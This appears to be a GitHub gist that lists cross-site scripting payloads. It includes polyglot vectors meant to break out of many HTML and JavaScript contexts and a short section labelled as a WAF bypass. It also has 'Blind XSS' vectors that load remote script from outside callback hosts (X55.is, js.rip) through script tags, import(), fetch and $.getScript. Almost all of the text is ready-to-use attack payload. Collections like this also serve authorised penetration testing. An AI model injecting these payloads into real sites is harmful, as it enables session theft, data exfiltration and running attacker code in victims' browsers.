@nullenc0de
Created March 27, 2025 16:40
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
1</Script/><Svg/OnLoad=(confirm)(1)>
1"<!--><Svg OnLoad=(confirm)(1)<!--
1</Script/><Svg/OnLoad%0A=(confirm)(1)>
"'-->confirm`xss`<%2FScript><Script%2F1%3D'
'"--></style></scRipt><scRipt>alert(1)</scRipt>
WAF BYPASS
<Img Src=OnXSS OnError=alert(1)>
Blind XSS
Blind XSS Custom Vector - Default
Simple, good for known PoCs.
<Script /Src=https://X55.is?1=1290></Script>
Blind XSS Custom Vector - Short Polyglot (HTML & JS Main Cases)
Balanced, good size and power.
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=1290/.source))//>
Blind XSS Custom Vector - Full Polyglot (20+ XSS Cases)
Best, for non-restricted inputs.
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=1290/.source))}//\76-->
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"><img src=x onerror='fetch("https://js.rip/t9eoip8zws)'><script>$.getScript("//js.rip/t9eoip8zws")</script><script src="//js.rip/t9eoip8zws"></script>